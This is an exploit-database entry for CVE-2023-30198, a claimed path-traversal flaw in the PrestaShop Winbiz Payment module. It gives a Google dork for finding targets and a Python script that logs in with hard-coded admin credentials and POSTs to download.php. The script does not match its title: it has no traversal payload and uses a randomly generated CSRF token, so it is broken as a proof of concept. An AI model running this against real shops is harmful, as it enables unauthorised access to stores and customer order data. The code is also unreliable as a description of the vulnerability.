PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory

EDB-ID:

51545




Platform:

PHP

Date:

2023-06-26


# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)